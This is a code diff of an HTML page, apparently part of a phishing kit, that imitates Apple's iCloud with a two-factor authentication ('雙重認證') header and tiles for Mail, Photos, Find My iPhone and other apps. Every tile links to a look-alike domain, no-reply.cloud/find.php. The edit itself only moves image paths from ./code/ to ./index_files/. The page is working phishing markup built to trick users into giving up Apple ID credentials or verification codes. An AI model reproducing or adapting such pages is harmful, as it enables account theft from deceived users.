--- a/codeindex.htm
+++ b/codeindex.htm
@@ -41,7 +41,7 @@
 	<br><br><br><br><br><br><br>
 <section class="login-form text-center" style="display: block;">
 <br>
-	<img src="./code/cloud.png" class="img-cloud" alt="">
+	<img src="./index_files/cloud.png" class="img-cloud" alt="">
         <h1 class="si-container-title" tabindex="-1">
             <font color="#F5F8F0">雙重認證</font>
         </h1>
@@ -181,16 +181,16 @@
 		<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/11.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/11.png" alt="">
 					<span>Reminders</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/9.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/9.png" alt="">
 					<span>
 						Notes
 					</span>
@@ -199,32 +199,32 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/3.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/3.png" alt="">
 					<span>iCloud Drive</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/10.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/10.png" alt="">
 					<span>Photos</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/1.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/1.png" alt="">
 					<span>Contacts</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/8.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/8.png" alt="">
 					<span>Mail</span>
 				</a>
 			</div>
@@ -235,8 +235,8 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/12.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/12.png" alt="">
 					<span>Settings</span>
 				</a>
 			</div>
@@ -244,8 +244,8 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/2.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/2.png" alt="">
 					<span>Find My iPhone</span>
 				</a>
 			</div>
@@ -253,24 +253,24 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/6.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/6.png" alt="">
 					<span>Keynote</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/5.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/5.png" alt="">
 					<span>Numbers</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/20.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/20.png" alt="">
 					<span>Find Friends</span>
 				</a>
 			</div>
@@ -278,8 +278,8 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src="./code/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src="./code/7.png" alt="">
+				<img src="./index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="./index_files/7.png" alt="">
 					<span>Pages</span>
 				</a>
 			</div>
